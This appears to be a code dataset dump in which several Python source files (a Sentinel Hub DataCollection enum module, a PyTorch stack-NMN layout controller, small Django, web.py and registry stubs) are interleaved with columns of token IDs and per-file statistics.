2889,
385,
62,
83,
23706,
13,
18439,
1330,
1772,
7509,
198,
6738,
300,
2889,
385,
62,
83,
23706,
13,
37724,
1330,
1635,
198,
6738,
300,
2889,
385,
62,
83,
23706,
13,
... | 2.539192 | 421 |
#!/usr/bin/env python3
# Utility to parse and validate a HAT package
import ctypes
from typing import Any, List, Union
from collections import OrderedDict
from functools import partial
from .hat_file import HATFile, Function, Parameter
from .arg_info import ArgInfo, verify_args
import os
class AttributeDict(OrderedDict):
    """Ordered dictionary whose entries can also be read as attributes.

    A missing name raises KeyError (not AttributeError), exactly like
    plain item access.
    """

    def __getattr__(self, name):
        # Attribute reads fall through to item lookup.
        return self[name]
@property
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
198,
2,
34030,
284,
21136,
290,
26571,
257,
367,
1404,
5301,
198,
198,
11748,
269,
19199,
198,
6738,
19720,
1330,
4377,
11,
7343,
11,
4479,
198,
6738,
17268,
1330,
14230,
1068,
35,... | 3.27972 | 143 |
"""Database connection for the database updater.
The database updater only deletes entries from the files table that exceeded
their timeout after being marked as deleted.
"""
# Python imports
import logging
import datetime
from typing import List, Union, Tuple
# Local imports
from crawler.database import measure_time
from crawler.database import DatabaseConnectionBase
| [
37811,
38105,
4637,
329,
262,
6831,
2325,
729,
13,
198,
198,
464,
6831,
2325,
729,
691,
28128,
274,
12784,
422,
262,
3696,
3084,
326,
20672,
198,
24571,
26827,
706,
852,
7498,
355,
13140,
13,
198,
37811,
628,
198,
2,
11361,
17944,
198... | 4.488095 | 84 |
import numpy as np
import torch
from torch import nn
from itertools import chain
class Controller(nn.Module):
    """
    Follows the architecture of "Explainable Neural Computation via Stack
    Neural Module Networks", Sec. 3.1: the layout controller.

    Parameters passed in from net.py:
    controller_kwargs = {
        'num_module': len(self.module_names),  # 6
        'dim_lstm': self.dim_hidden,           # 1024
        'T_ctrl': self.T_ctrl,                 # default 3; controller decode length
                                               # (the time steps in the paper)
        'use_gumbel': self.use_gumbel,         # default False; whether to use
                                               # gumbel softmax for module prob
    }
    """

    def forward(self, lstm_seq, q_encoding, embed_seq, seq_length_batch):
        """
        Input:
            lstm_seq: [seq_max_len, batch_size, d]
            q_encoding: [batch_size, d]
            embed_seq: [seq_max_len, batch_size, e]
            seq_length_batch: [batch_size]
        """
        device = lstm_seq.device
        # Inputs are batch_first=False, so lstm_seq.size(1) is the batch size.
        batch_size, seq_max_len = lstm_seq.size(1), lstm_seq.size(0)
        seq_length_batch = seq_length_batch.view(1, batch_size).expand(
            seq_max_len, batch_size)  # [seq_max_len, batch_size]
        # Broadcast the learned initial textual parameter to the whole batch.
        c_prev = self.c_init.expand(batch_size, self.dim_lstm)  # (batch_size, dim)
        # Per-time-step result accumulators.
        module_logit_list = []
        module_prob_list = []
        c_list, cv_list = [], []
        for t in range(self.T_ctrl):
            # Question encoding through the time-step-specific linear layer.
            q_i = self.fc_q_list[t](q_encoding)
            # Concatenate with the previous textual parameter:
            # [W_1^(t)q + b_1; c_(t-1)]
            q_i_c = torch.cat([q_i, c_prev], dim=1)  # [batch_size, 2d]
            # Second linear layer produces u with output dimension d.
            cq_i = self.fc_q_cat_c(q_i_c)  # [batch_size, d]
            # Predict the module weight distribution; module_logit holds the
            # pre-softmax logits, module_prob the (gumbel-)softmax weights.
            module_logit = self.fc_module_weight(cq_i)  # [batch_size, num_module]
            module_prob = nn.functional.gumbel_softmax(module_logit, hard=self.use_gumbel)  # [batch_size, num_module]
            # Hadamard product of u with every hidden state h_s.
            elem_prod = cq_i.unsqueeze(0) * lstm_seq  # [seq_max_len, batch_size, dim]
            # Each column of raw_cv_i holds one question's per-word logits.
            raw_cv_i = self.fc_raw_cv(elem_prod).squeeze(2)  # [seq_max_len, batch_size]
            # Sequences are padded to seq_max_len; restrict attention to real
            # words by masking positions past each sequence's length.
            invalid_mask = torch.arange(seq_max_len).long().to(device).view(-1, 1).expand_as(raw_cv_i).ge(
                seq_length_batch)
            # Padded positions become -inf so softmax assigns them zero weight.
            raw_cv_i.data.masked_fill_(invalid_mask, -float('inf'))
            # Column-wise softmax: per-question attention weights over words.
            cv_i = nn.functional.softmax(raw_cv_i, dim=0).unsqueeze(2)  # [seq_max_len, batch_size, 1]
            # c_t = sigma_{s=1}^S(cv_(t,s) * h_s))
            c_i = torch.sum(lstm_seq * cv_i, dim=0)  # [batch_size, d]
            # c_i must be (batch_size, dim_lstm).
            assert c_i.size(0) == batch_size and c_i.size(1) == self.dim_lstm
            # Thread the textual parameter to the next time step.
            c_prev = c_i
            # Append this time step's results.
            module_logit_list.append(module_logit)
            module_prob_list.append(module_prob)
            c_list.append(c_i)
            # Each cv_list element is (batch_size, seq_max_len); rows are the
            # word weights of one example.
            cv_list.append(cv_i.squeeze(2).permute(1, 0))
        # Stack the per-time-step results and return.
        return (torch.stack(module_logit_list),  # [T_ctrl, batch_size, num_module]
                torch.stack(module_prob_list),  # [T_ctrl, batch_size, num_module]
                torch.stack(c_list),  # [T_ctrl, batch_size, d]
                torch.stack(cv_list))  # [T_ctrl, batch_size, seq_max_len]
| [
11748,
299,
32152,
355,
45941,
198,
11748,
28034,
198,
6738,
28034,
1330,
299,
77,
198,
6738,
340,
861,
10141,
1330,
6333,
628,
198,
4871,
22741,
7,
20471,
13,
26796,
2599,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
16268,
223,
11... | 1.382525 | 2,907 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
@author: Tiantian
"""
import torch
import torch.nn as nn
from torch.autograd import Variable
from torch.nn import functional as F
import pdb
from torch.nn.modules import dropout
import itertools
from pytorch_lightning.core.lightning import LightningModule
import numpy as np
from sklearn.metrics import accuracy_score, recall_score
from sklearn.metrics import confusion_matrix
from torch.optim.lr_scheduler import ReduceLROnPlateau
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
37811,
198,
31,
9800,
25,
309,
3014,
666,
198,
37811,
198,
11748,
28034,
198,
11748,
28034,
13,
20471,
355,
299,
... | 3.211921 | 151 |
from django.contrib.auth import get_user_model
from core.mixins import TemplateLoginRequiredMixin
User = get_user_model()
| [
6738,
42625,
14208,
13,
3642,
822,
13,
18439,
1330,
651,
62,
7220,
62,
19849,
198,
198,
6738,
4755,
13,
19816,
1040,
1330,
37350,
47790,
37374,
35608,
259,
198,
198,
12982,
796,
651,
62,
7220,
62,
19849,
3419,
628,
628,
628,
628,
198
... | 3.142857 | 42 |
"""
Module defining data collections
"""
import warnings
from enum import Enum, EnumMeta
from typing import Tuple, Optional
from dataclasses import dataclass, field, fields
from aenum import extend_enum
from .config import SHConfig
from .constants import ServiceUrl
from .exceptions import SHDeprecationWarning
from .data_collections_bands import Band, Bands, MetaBands
class _CollectionType:
    """ Types of Sentinel Hub data collections
    """
    # Display labels for satellite missions / collection families; attached to
    # the DataCollection definitions below.
    SENTINEL1 = 'Sentinel-1'
    SENTINEL2 = 'Sentinel-2'
    SENTINEL3 = 'Sentinel-3'
    SENTINEL5P = 'Sentinel-5P'
    LANDSAT_MSS = 'Landsat 1-5 MSS'
    LANDSAT_TM = 'Landsat 4-5 TM'
    LANDSAT5 = 'Landsat 5'
    LANDSAT_ETM = 'Landsat 7 ETM+'
    LANDSAT_OT = 'Landsat 8 OLI and TIRS'
    MODIS = 'MODIS'
    ENVISAT_MERIS = 'Envisat Meris'
    DEM = 'DEM'
    BYOC = 'BYOC'
    BATCH = 'BATCH'
class _SensorType:
    """ Satellite sensors
    """
    # pylint: disable=invalid-name
    # Instrument names used in DataCollection definitions below.
    MSI = 'MSI'
    OLI_TIRS = 'OLI-TIRS'
    TM = 'TM'
    ETM = 'ETM+'
    MSS = 'MSS'
    C_SAR = 'C-SAR'
    OLCI = 'OLCI'
    SLSTR = 'SLSTR'
    TROPOMI = 'TROPOMI'
class _ProcessingLevel:
    """ Processing levels
    """
    # pylint: disable=invalid-name
    # Level labels applied to satellite products (L1/L2 variants, GRD for SAR).
    L1 = 'L1'
    L2 = 'L2'
    L1B = 'L1B'
    L1C = 'L1C'
    L2A = 'L2A'
    L3B = 'L3B'
    GRD = 'GRD'
class _SwathMode:
    """ Swath modes for SAR sensors
    """
    # pylint: disable=invalid-name
    # Acquisition-mode labels used in the Sentinel-1 definitions below.
    IW = 'IW'
    EW = 'EW'
    SM = 'SM'
    WV = 'WV'
class _Polarization:
    """ SAR polarizations
    """
    # pylint: disable=invalid-name
    # Polarization labels used in the Sentinel-1 definitions below.
    DV = 'DV'
    DH = 'DH'
    SV = 'SV'
    SH = 'SH'
    HH = 'HH'
    HV = 'HV'
    VV = 'VV'
    VH = 'VH'
class _Resolution:
    """ Product resolution (specific to Sentinel-1 collections)
    """
    MEDIUM = 'MEDIUM'
    HIGH = 'HIGH'
class OrbitDirection:
    """ Orbit directions
    """
    # Used both as definition metadata and as a data filter value.
    ASCENDING = 'ASCENDING'
    DESCENDING = 'DESCENDING'
    BOTH = 'BOTH'
def _shallow_asdict(dataclass_instance):
""" Returns a dictionary of fields and values, but is not recursive and does not deepcopy like `asdict` """
# This definition needs to be above the class definitions in the file
return {field.name: getattr(dataclass_instance, field.name) for field in fields(dataclass_instance)}
class _DataCollectionMeta(EnumMeta):
    """ Meta class that builds DataCollection class enums
    """

    def __getattribute__(cls, item, *args, **kwargs):
        """ This is executed whenever `DataCollection.SOMETHING` is called

        Extended method handles cases where a collection has been renamed. It provides a new collection and raises a
        deprecation warning.
        """
        # Transparently redirect legacy names to their replacement while
        # warning the caller; lookups then proceed with the new name.
        if item in _RENAMED_COLLECTIONS:
            old_item = item
            item = _RENAMED_COLLECTIONS[old_item]
            message = f'DataCollection.{old_item} had been renamed into DataCollection.{item}. Please switch to the ' \
                      'new name as the old one will soon be removed.'
            warnings.warn(message, category=SHDeprecationWarning)
        return super().__getattribute__(item, *args, **kwargs)

    def __call__(cls, value, *args, **kwargs):
        """ This is executed whenever `DataCollection('something')` is called

        This solves a problem of pickling a custom DataCollection and unpickling it in another process
        """
        # An unpickled custom definition is not yet a registered enum member;
        # re-register it under its preserved _name before normal enum lookup.
        if isinstance(value, DataCollectionDefinition) and value not in cls._value2member_map_ and value._name:
            cls._try_add_data_collection(value._name, value)
        return super().__call__(value, *args, **kwargs)
@dataclass(frozen=True)
class DataCollectionDefinition:
    """ An immutable definition of a data collection

    Check `DataCollection.define` for more info about attributes of this class
    """
    # pylint: disable=too-many-instance-attributes
    api_id: Optional[str] = None  # ID used by Sentinel Hub Process API
    catalog_id: Optional[str] = None  # ID used by Sentinel Hub Catalog API
    wfs_id: Optional[str] = None  # ID used by the Sentinel Hub WFS service
    service_url: Optional[str] = None  # base URL of the service deployment
    collection_type: Optional[str] = None
    sensor_type: Optional[str] = None
    processing_level: Optional[str] = None
    swath_mode: Optional[str] = None  # SAR-specific
    polarization: Optional[str] = None  # SAR-specific
    resolution: Optional[str] = None  # Sentinel-1 specific
    orbit_direction: Optional[str] = None
    timeliness: Optional[str] = None
    bands: Optional[Tuple[Band, ...]] = None
    metabands: Optional[Tuple[Band, ...]] = None
    collection_id: Optional[str] = None  # BYOC/BATCH collection id
    is_timeless: bool = False
    has_cloud_coverage: bool = False
    dem_instance: Optional[str] = None
    # The following parameter is used to preserve custom DataCollection name during pickling and unpickling process:
    _name: Optional[str] = field(default=None, compare=False)

    def __post_init__(self):
        """ In case a list of bands or metabands has been given this makes sure to cast it into a tuple
        """
        # Frozen dataclass: attribute writes must go through object.__setattr__.
        if isinstance(self.bands, list):
            object.__setattr__(self, 'bands', tuple(self.bands))
        if isinstance(self.metabands, list):
            object.__setattr__(self, 'metabands', tuple(self.metabands))

    def __repr__(self):
        """ A nicer representation of parameters that define a data collection
        """
        # Only show parameters that are set; _name is an internal detail.
        valid_params = {name: value for name, value in _shallow_asdict(self).items() if value is not None}
        params_repr = '\n  '.join(f'{name}: {value}' for name, value in valid_params.items() if name != '_name')
        return f'{self.__class__.__name__}(\n  {params_repr}\n)'

    def derive(self, **params):
        """ Create a new data collection definition from current definition and parameters that override current
        parameters

        :param params: Any of DataCollectionDefinition attributes
        :return: A new data collection definition
        :rtype: DataCollectionDefinition
        """
        derived_params = _shallow_asdict(self)
        derived_params.update(params)

        return DataCollectionDefinition(**derived_params)
# DataCollection renaming for backwards-compatibility: maps a deprecated
# attribute name to its replacement (consumed by _DataCollectionMeta, which
# emits an SHDeprecationWarning on access to the old name).
_RENAMED_COLLECTIONS = {
    'LANDSAT15_L1': 'LANDSAT_MSS_L1',
    'LANDSAT45_L1': 'LANDSAT_TM_L1',
    'LANDSAT45_L2': 'LANDSAT_TM_L2',
    'LANDSAT7_L1': 'LANDSAT_ETM_L1',
    'LANDSAT7_L2': 'LANDSAT_ETM_L2',
    'LANDSAT8': 'LANDSAT_OT_L1',
    'LANDSAT8_L1': 'LANDSAT_OT_L1',
    'LANDSAT8_L2': 'LANDSAT_OT_L2'
}
class DataCollection(Enum, metaclass=_DataCollectionMeta):
""" An enum class for data collections
It contains a number of predefined data collections, which are the most commonly used with Sentinel Hub service.
Additionally it also allows defining new data collections by specifying data collection parameters relevant for
the service. Check `DataCollection.define` and similar methods for more.
"""
SENTINEL2_L1C = DataCollectionDefinition(
api_id='sentinel-2-l1c',
catalog_id='sentinel-2-l1c',
wfs_id='DSS1',
service_url=ServiceUrl.MAIN,
collection_type=_CollectionType.SENTINEL2,
sensor_type=_SensorType.MSI,
processing_level=_ProcessingLevel.L1C,
bands=Bands.SENTINEL2_L1C,
metabands=MetaBands.SENTINEL2_L1C,
has_cloud_coverage=True,
)
SENTINEL2_L2A = DataCollectionDefinition(
api_id='sentinel-2-l2a',
catalog_id='sentinel-2-l2a',
wfs_id='DSS2',
service_url=ServiceUrl.MAIN,
collection_type=_CollectionType.SENTINEL2,
sensor_type=_SensorType.MSI,
processing_level=_ProcessingLevel.L2A,
bands=Bands.SENTINEL2_L2A,
metabands=MetaBands.SENTINEL2_L2A,
has_cloud_coverage=True,
)
SENTINEL1 = DataCollectionDefinition(
api_id='sentinel-1-grd',
catalog_id='sentinel-1-grd',
wfs_id='DSS3',
service_url=ServiceUrl.MAIN,
collection_type=_CollectionType.SENTINEL1,
sensor_type=_SensorType.C_SAR,
processing_level=_ProcessingLevel.GRD,
orbit_direction=OrbitDirection.BOTH,
metabands=MetaBands.SENTINEL1,
)
SENTINEL1_IW = SENTINEL1.derive(
swath_mode=_SwathMode.IW,
polarization=_Polarization.DV,
resolution=_Resolution.HIGH,
bands=Bands.SENTINEL1_IW,
)
SENTINEL1_IW_ASC = SENTINEL1_IW.derive(
orbit_direction=OrbitDirection.ASCENDING,
)
SENTINEL1_IW_DES = SENTINEL1_IW.derive(
orbit_direction=OrbitDirection.DESCENDING,
)
SENTINEL1_EW = SENTINEL1.derive(
swath_mode=_SwathMode.EW,
polarization=_Polarization.DH,
resolution=_Resolution.MEDIUM,
bands=Bands.SENTINEL1_EW,
)
SENTINEL1_EW_ASC = SENTINEL1_EW.derive(
orbit_direction=OrbitDirection.ASCENDING,
)
SENTINEL1_EW_DES = SENTINEL1_EW.derive(
orbit_direction=OrbitDirection.DESCENDING,
)
SENTINEL1_EW_SH = SENTINEL1_EW.derive(
polarization=_Polarization.SH,
bands=Bands.SENTINEL1_EW_SH,
)
SENTINEL1_EW_SH_ASC = SENTINEL1_EW_SH.derive(
orbit_direction=OrbitDirection.ASCENDING,
)
SENTINEL1_EW_SH_DES = SENTINEL1_EW_SH.derive(
orbit_direction=OrbitDirection.DESCENDING,
)
DEM = DataCollectionDefinition(
api_id='dem',
service_url=ServiceUrl.MAIN,
collection_type=_CollectionType.DEM,
bands=Bands.DEM,
metabands=MetaBands.DEM,
is_timeless=True,
)
DEM_MAPZEN = DEM.derive(
dem_instance='MAPZEN',
)
DEM_COPERNICUS_30 = DEM.derive(
dem_instance='COPERNICUS_30',
)
DEM_COPERNICUS_90 = DEM.derive(
dem_instance='COPERNICUS_90',
)
MODIS = DataCollectionDefinition(
api_id='modis',
catalog_id='modis',
wfs_id='DSS5',
service_url=ServiceUrl.USWEST,
collection_type=_CollectionType.MODIS,
bands=Bands.MODIS,
metabands=MetaBands.MODIS,
)
LANDSAT_MSS_L1 = DataCollectionDefinition(
api_id='landsat-mss-l1',
catalog_id='landsat-mss-l1',
wfs_id='DSS14',
service_url=ServiceUrl.USWEST,
collection_type=_CollectionType.LANDSAT_MSS,
sensor_type=_SensorType.MSS,
processing_level=_ProcessingLevel.L1,
bands=Bands.LANDSAT_MSS_L1,
metabands=MetaBands.LANDSAT_MSS_L1,
has_cloud_coverage=True,
)
LANDSAT_TM_L1 = DataCollectionDefinition(
api_id='landsat-tm-l1',
catalog_id='landsat-tm-l1',
wfs_id='DSS15',
service_url=ServiceUrl.USWEST,
collection_type=_CollectionType.LANDSAT_TM,
sensor_type=_SensorType.TM,
processing_level=_ProcessingLevel.L1,
bands=Bands.LANDSAT_TM_L1,
metabands=MetaBands.LANDSAT_TM_L1,
has_cloud_coverage=True,
)
LANDSAT_TM_L2 = LANDSAT_TM_L1.derive(
api_id='landsat-tm-l2',
catalog_id='landsat-tm-l2',
wfs_id='DSS16',
processing_level=_ProcessingLevel.L2,
bands=Bands.LANDSAT_TM_L2,
metabands=MetaBands.LANDSAT_TM_L2,
)
LANDSAT_ETM_L1 = DataCollectionDefinition(
api_id='landsat-etm-l1',
catalog_id='landsat-etm-l1',
wfs_id='DSS17',
service_url=ServiceUrl.USWEST,
collection_type=_CollectionType.LANDSAT_ETM,
sensor_type=_SensorType.ETM,
processing_level=_ProcessingLevel.L1,
bands=Bands.LANDSAT_ETM_L1,
metabands=MetaBands.LANDSAT_ETM_L1,
has_cloud_coverage=True,
)
LANDSAT_ETM_L2 = LANDSAT_ETM_L1.derive(
api_id='landsat-etm-l2',
catalog_id='landsat-etm-l2',
wfs_id='DSS18',
processing_level=_ProcessingLevel.L2,
bands=Bands.LANDSAT_ETM_L2,
metabands=MetaBands.LANDSAT_ETM_L2,
)
LANDSAT_OT_L1 = DataCollectionDefinition(
api_id='landsat-ot-l1',
catalog_id='landsat-ot-l1',
wfs_id='DSS12',
service_url=ServiceUrl.USWEST,
collection_type=_CollectionType.LANDSAT_OT,
sensor_type=_SensorType.OLI_TIRS,
processing_level=_ProcessingLevel.L1,
bands=Bands.LANDSAT_OT_L1,
metabands=MetaBands.LANDSAT_OT_L1,
has_cloud_coverage=True,
)
LANDSAT_OT_L2 = LANDSAT_OT_L1.derive(
api_id='landsat-ot-l2',
catalog_id='landsat-ot-l2',
wfs_id='DSS13',
processing_level=_ProcessingLevel.L2,
bands=Bands.LANDSAT_OT_L2,
metabands=MetaBands.LANDSAT_OT_L2,
)
SENTINEL5P = DataCollectionDefinition(
api_id='sentinel-5p-l2',
catalog_id='sentinel-5p-l2',
wfs_id='DSS7',
service_url=ServiceUrl.CREODIAS,
collection_type=_CollectionType.SENTINEL5P,
sensor_type=_SensorType.TROPOMI,
processing_level=_ProcessingLevel.L2,
bands=Bands.SENTINEL5P,
metabands=MetaBands.SENTINEL5P,
)
SENTINEL3_OLCI = DataCollectionDefinition(
api_id='sentinel-3-olci',
catalog_id='sentinel-3-olci',
wfs_id='DSS8',
service_url=ServiceUrl.CREODIAS,
collection_type=_CollectionType.SENTINEL3,
sensor_type=_SensorType.OLCI,
processing_level=_ProcessingLevel.L1B,
bands=Bands.SENTINEL3_OLCI,
metabands=MetaBands.SENTINEL3_OLCI,
)
SENTINEL3_SLSTR = DataCollectionDefinition(
api_id='sentinel-3-slstr',
catalog_id='sentinel-3-slstr',
wfs_id='DSS9',
service_url=ServiceUrl.CREODIAS,
collection_type=_CollectionType.SENTINEL3,
sensor_type=_SensorType.SLSTR,
processing_level=_ProcessingLevel.L1B,
bands=Bands.SENTINEL3_SLSTR,
metabands=MetaBands.SENTINEL3_SLSTR,
has_cloud_coverage=True,
)
# EOCloud collections (which are only available on a development eocloud service):
LANDSAT5 = DataCollectionDefinition(
wfs_id='L5.TILE',
service_url=ServiceUrl.EOCLOUD,
processing_level=_ProcessingLevel.GRD,
)
LANDSAT7 = DataCollectionDefinition(
wfs_id='L7.TILE',
service_url=ServiceUrl.EOCLOUD,
processing_level=_ProcessingLevel.GRD,
)
ENVISAT_MERIS = DataCollectionDefinition(
wfs_id='ENV.TILE',
service_url=ServiceUrl.EOCLOUD,
collection_type=_CollectionType.ENVISAT_MERIS,
)
# pylint: disable=too-many-locals
@classmethod
def define(cls, name, *, api_id=None, catalog_id=None, wfs_id=None, service_url=None, collection_type=None,
sensor_type=None, processing_level=None, swath_mode=None, polarization=None, resolution=None,
orbit_direction=None, timeliness=None, bands=None, metabands=None, collection_id=None, is_timeless=False,
has_cloud_coverage=False, dem_instance=None):
""" Define a new data collection
Note that all parameters, except `name` are optional. If a data collection definition won't be used for a
certain use case (e.g. Process API, WFS, etc.), parameters for that use case don't have to be defined
:param name: A name of a new data collection
:type name: str
:param api_id: An ID to be used for Sentinel Hub Process API
:type api_id: str or None
:param catalog_id: An ID to be used for Sentinel Hub Catalog API
:type catalog_id: str or None
:param wfs_id: An ID to be used for Sentinel Hub WFS service
:type wfs_id: str or None
:param service_url: A base URL of Sentinel Hub service deployment from where to download data. If it is not
specified, a `sh_base_url` from a config will be used by default
:type service_url: str or None
:param collection_type: A collection type
:type collection_type: str or None
:param sensor_type: A type of a satellite's sensor
:type sensor_type: str or None
:param processing_level: A level of processing applied on satellite data
:type processing_level: str or None
:param swath_mode: A swath mode of SAR sensors
:type swath_mode: str or None
:param polarization: A type of polarization
:type polarization: str or None
:param resolution: A type of (Sentinel-1) resolution
:type resolution: str or None
:param orbit_direction: A direction of satellite's orbit by which to filter satellite's data
:type orbit_direction: str or None
:param timeliness: A timeliness of data
:type timeliness: str or None
:param bands: Information about data collection bands
:type bands: tuple(Band) or None
:param metabands: Information about data collection metabands
:type metabands: tuple(Band) or None
:param collection_id: An ID of a BYOC or BATCH collection
:type collection_id: str or None
:param is_timeless: `True` if a data collection can be filtered by time dimension and `False` otherwise
:type is_timeless: bool
:param has_cloud_coverage: `True` if data collection can be filtered by cloud coverage percentage and `False`
otherwise
:type has_cloud_coverage: bool
:param dem_instance: one of the options listed in
`DEM documentation <https://docs.sentinel-hub.com/api/latest/data/dem/#deminstance>`__
:type dem_instance: str or None
:return: A new data collection
:rtype: DataCollection
"""
definition = DataCollectionDefinition(
api_id=api_id,
catalog_id=catalog_id,
wfs_id=wfs_id,
service_url=service_url,
collection_type=collection_type,
sensor_type=sensor_type,
processing_level=processing_level,
swath_mode=swath_mode,
polarization=polarization,
resolution=resolution,
orbit_direction=orbit_direction,
timeliness=timeliness,
bands=bands,
metabands=metabands,
collection_id=collection_id,
is_timeless=is_timeless,
has_cloud_coverage=has_cloud_coverage,
dem_instance=dem_instance,
_name=name
)
cls._try_add_data_collection(name, definition)
return cls(definition)
def define_from(self, name, **params):
""" Define a new data collection from an existing one
:param name: A name of a new data collection
:type name: str
:param params: Any parameter to override current data collection parameters
:return: A new data collection
:rtype: DataCollection
"""
definition = self.value
new_definition = definition.derive(**params, _name=name)
self._try_add_data_collection(name, new_definition)
return DataCollection(new_definition)
@classmethod
def _try_add_data_collection(cls, name, definition):
""" Tries adding a new data collection definition. If the exact enum has already been defined then it won't do
anything. However, if either a name or a definition has already been matched with another name or definition
then it will raise an error.
"""
is_name_defined = name in cls.__members__
is_enum_defined = is_name_defined and cls.__members__[name].value == definition
is_definition_defined = definition in cls._value2member_map_
if is_enum_defined:
return
if not is_name_defined and not is_definition_defined:
extend_enum(cls, name, definition)
return
if is_name_defined:
raise ValueError(f"Data collection name '{name}' is already taken by another data collection")
existing_collection = cls._value2member_map_[definition]
raise ValueError(f'Data collection definition is already taken by {existing_collection}. Two different '
f'DataCollection enums cannot have the same definition.')
@classmethod
def define_byoc(cls, collection_id, **params):
""" Defines a BYOC data collection
:param collection_id: An ID of a data collection
:type collection_id: str
:param params: Any parameter to override default BYOC data collection parameters
:return: A new data collection
:rtype: DataCollection
"""
params['name'] = params.get('name', f'BYOC_{collection_id}')
params['api_id'] = params.get('api_id', f'byoc-{collection_id}')
params['catalog_id'] = params.get('catalog_id', f'byoc-{collection_id}')
params['wfs_id'] = params.get('wfs_id', f'byoc-{collection_id}')
params['collection_type'] = params.get('collection_type', _CollectionType.BYOC)
params['collection_id'] = collection_id
return cls.define(**params)
@classmethod
def define_batch(cls, collection_id, **params):
""" Defines a BATCH data collection
:param collection_id: An ID of a data collection
:type collection_id: str
:param params: Any parameter to override default BATCH data collection parameters
:return: A new data collection
:rtype: DataCollection
"""
params['name'] = params.get('name', f'BATCH_{collection_id}')
params['api_id'] = params.get('api_id', f'batch-{collection_id}')
params['catalog_id'] = params.get('catalog_id', f'batch-{collection_id}')
params['wfs_id'] = params.get('wfs_id', f'batch-{collection_id}')
params['collection_type'] = params.get('collection_type', _CollectionType.BATCH)
params['collection_id'] = collection_id
return cls.define(**params)
@property
def api_id(self):
""" Provides a Sentinel Hub Process API identifier or raises an error if it is not defined
:return: An identifier
:rtype: str
:raises: ValueError
"""
if self.value.api_id is None:
raise ValueError(f'Data collection {self.name} is missing a Sentinel Hub Process API identifier')
return self.value.api_id
@property
def catalog_id(self):
""" Provides a Sentinel Hub Catalog API identifier or raises an error if it is not defined
:return: An identifier
:rtype: str
:raises: ValueError
"""
if self.value.catalog_id is not None:
return self.value.catalog_id
if self.value.api_id is not None:
# A fallback because Process API and Catalog API IDs should now be unified
return self.value.api_id
raise ValueError(f'Data collection {self.name} is missing a Sentinel Hub Catalog API identifier')
@property
def wfs_id(self):
""" Provides a Sentinel Hub WFS identifier or raises an error if it is not defined
:return: An identifier
:rtype: str
:raises: ValueError
"""
if self.value.wfs_id is None:
raise ValueError(f'Data collection {self.name} is missing a Sentinel Hub WFS identifier')
return self.value.wfs_id
@property
def bands(self):
""" Provides band information available for the data collection
:return: A tuple of band info
:rtype: tuple(str)
:raises: ValueError
"""
if self.value.bands is None:
raise ValueError(f'Data collection {self.name} does not define bands')
return self.value.bands
@property
def metabands(self):
""" Provides metaband information available for the data collection
:return: A tuple of metaband info
:rtype: tuple(str)
:raises: ValueError
"""
if self.value.metabands is None:
raise ValueError(f'Data collection {self.name} does not define metabands')
return self.value.metabands
def __getattr__(self, item, *args, **kwargs):
""" The following insures that any attribute from DataCollectionDefinition, which is already not a
property or an attribute of DataCollection, becomes an attribute of DataCollection
"""
if not item.startswith('_') and hasattr(self, 'value') and isinstance(self.value, DataCollectionDefinition):
definition_dict = _shallow_asdict(self.value)
if item in definition_dict:
return definition_dict[item]
return super().__getattribute__(item, *args, **kwargs)
@property
def is_sentinel1(self):
""" Checks if data collection is a Sentinel-1 collection type
Example: ``DataCollection.SENTINEL1_IW.is_sentinel1``
:return: `True` if collection is Sentinel-1 collection type and `False` otherwise
:rtype: bool
"""
return self.collection_type == _CollectionType.SENTINEL1
@property
def is_byoc(self):
""" Checks if data collection is a BYOC collection type
:return: `True` if collection is a BYOC collection type and `False` otherwise
:rtype: bool
"""
return self.collection_type == _CollectionType.BYOC
@property
def is_batch(self):
""" Checks if data collection is a batch collection type
:return: `True` if collection is a batch collection type and `False` otherwise
:rtype: bool
"""
return self.collection_type == _CollectionType.BATCH
def contains_orbit_direction(self, orbit_direction):
""" Checks if a data collection contains given orbit direction
:param orbit_direction: An orbit direction
:type orbit_direction: string
:return: `True` if data collection contains the orbit direction
:return: bool
"""
defined_direction = self.orbit_direction
if defined_direction is None or defined_direction.upper() == OrbitDirection.BOTH:
return True
return orbit_direction.upper() == defined_direction.upper()
@classmethod
def get_available_collections(cls, config=None):
""" Returns which data collections are available for configured Sentinel Hub OGC URL
:param config: A custom instance of config class to override parameters from the saved configuration.
:type config: SHConfig or None
:return: List of available data collections
:rtype: list(DataCollection)
"""
config = config or SHConfig()
is_eocloud = config.has_eocloud_url()
return [data_collection for data_collection in cls
if (data_collection.service_url == ServiceUrl.EOCLOUD) == is_eocloud]
DataSource = DataCollection
def handle_deprecated_data_source(data_collection, data_source, default=None):
""" Joins parameters used to specify a data collection. In case data_source is given it raises a warning. In case
both are given it raises an error. In case neither are given but there is a default collection it raises another
warning.
Note that this function is only temporary and will be removed in future package versions
"""
if data_source is not None:
warnings.warn('Parameter data_source is deprecated, use data_collection instead',
category=SHDeprecationWarning)
if data_collection is not None and data_source is not None:
raise ValueError('Only one of the parameters data_collection and data_source should be given')
if data_collection is None and data_source is None and default is not None:
warnings.warn('In the future please specify data_collection parameter, for now taking '
'DataCollection.SENTINEL2_L1C', category=SHDeprecationWarning)
return default
return data_collection or data_source
| [
37811,
198,
26796,
16215,
1366,
17268,
198,
37811,
198,
11748,
14601,
198,
6738,
33829,
1330,
2039,
388,
11,
2039,
388,
48526,
198,
6738,
19720,
1330,
309,
29291,
11,
32233,
198,
6738,
4818,
330,
28958,
1330,
4818,
330,
31172,
11,
2214,
... | 2.376942 | 11,588 |
#!/usr/bin/env python
# coding: utf-8
import web
from config import settings
from datetime import datetime
render = settings.render
db = settings.db
tb = 'todo'
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
2,
19617,
25,
3384,
69,
12,
23,
198,
11748,
3992,
198,
6738,
4566,
1330,
6460,
198,
6738,
4818,
8079,
1330,
4818,
8079,
198,
198,
13287,
796,
6460,
13,
13287,
198,
9945,
796,
6460,
1... | 3.055556 | 54 |
from smoke.utils.registry import Registry
BACKBONES = Registry()
SMOKE_HEADS = Registry()
SMOKE_PREDICTOR = Registry()
| [
6738,
7523,
13,
26791,
13,
2301,
4592,
1330,
33432,
198,
198,
31098,
33,
39677,
796,
33432,
3419,
198,
50,
11770,
7336,
62,
37682,
50,
796,
33432,
3419,
198,
50,
